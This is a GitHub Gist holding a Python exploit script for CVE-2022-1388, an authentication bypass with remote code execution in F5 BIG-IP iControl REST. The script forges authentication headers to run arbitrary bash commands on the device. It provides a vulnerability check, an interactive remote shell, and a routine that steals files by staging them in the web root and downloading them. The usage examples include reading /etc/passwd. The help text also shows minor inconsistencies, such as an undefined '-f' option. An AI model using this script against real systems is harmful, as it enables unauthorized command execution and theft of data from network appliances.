Last active
May 11, 2022 05:05
-
-
Save Ayoub-2/8ff7e53b47beb4a12d05f3e3e6cb8649 to your computer and use it in GitHub Desktop.
CVE-2022-1388.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| """ | |
| Author: @Ayoub-2 | |
| File : CVE-2022-1388.py | |
| Desc : CVE-2022-1388 exploitation script in python | |
| """ | |
| import requests | |
| import urllib3 | |
| import argparse | |
| urllib3.disable_warnings() | |
| parser = argparse.ArgumentParser( | |
| description="CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE") | |
| parser.add_argument('-u', '--url', type=str, | |
| help="set url") | |
| parser.add_argument('-c', '--check', action="store_false" | |
| ,help="check for vulnerability only") | |
| parser.add_argument('-d', '--download', type=str | |
| ,help="download file") | |
| args = parser.parse_args() | |
| endpoint = "/mgmt/tm/util/bash" | |
| headers = { | |
| 'Connection': 'close, X-F5-Auth-Token, X-Forwarded-For, Local-Ip-From-Httpd, X-F5-New-Authtok-Reqd, X-Forwarded-Server, X-Forwarded-Host', | |
| 'X-F5-Auth-Token': 'anything', | |
| } | |
| def check() : | |
| global url | |
| if exploit('id') : | |
| print(f"{url} is vulnerable !!! ") | |
| else : | |
| print(f"{url} is not vulnerable ") | |
| def usage(): | |
| print("Eg: \n python3 CVE-2022-1388.py -u https://127.0.0.1") | |
| print(" python3 CVE-2022-1388.py -u httts://127.0.0.1 -c 'cat /etc/passwd'") | |
| print(" python3 CVE-2022-1388.py -f urls.txt") | |
| def exploit( cmd) : | |
| global headers,url,endpoint | |
| json_data = {'command': 'run' , "utilCmdArgs": f"-c '{cmd}'"} | |
| if "https://" in url : | |
| response = requests.post(url + endpoint , verify=False , headers=headers, json=json_data, auth=('admin', '')) | |
| elif "http://" in url : | |
| response = requests.post(url + endpoint , verify=False , headers=headers, json=json_data, auth=('admin', '')) | |
| if "commandResult" in response.json() : | |
| return response.json()["commandResult"] | |
| else : | |
| return None | |
| def download(file) : | |
| print(f"[+] Downloading ... {file}") | |
| res =exploit(f"find / -name {file}" ) | |
| if not res : | |
| print(f"{file} not found in victim") | |
| return | |
| hsh = exploit(f"md5sum {file}").split(" ")[0] | |
| print(f"[+] Downloading ... {file} hash : {hsh}") | |
| exploit(f"cp {file} /usr/local/www/{hsh}") | |
| exploit(f"chmod 777 /usr/local/www/{hsh}") | |
| r = requests.get(url+"/"+hsh , verify=False) | |
| with open(f"{hsh}" , "wb") as fd: | |
| fd.write(r.content) | |
| print(f"[+] file saved as {hsh}") | |
| exploit(f"rm /usr/local/www/{hsh}") | |
| def shell() : | |
| while True : | |
| cmd = input("$ ") | |
| result = exploit(cmd) | |
| if result : | |
| print(result) | |
| else : | |
| print("command send , but no output") | |
| if __name__ == '__main__': | |
| if args.url : | |
| if args.url[-1] == "/" : | |
| url = args.url[:-1] | |
| else : | |
| url = args.url | |
| else : | |
| usage() | |
| exit() | |
| if args.download : | |
| download(args.download) | |
| if args.check == False : | |
| check() | |
| else : | |
| shell() | |
| exit() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment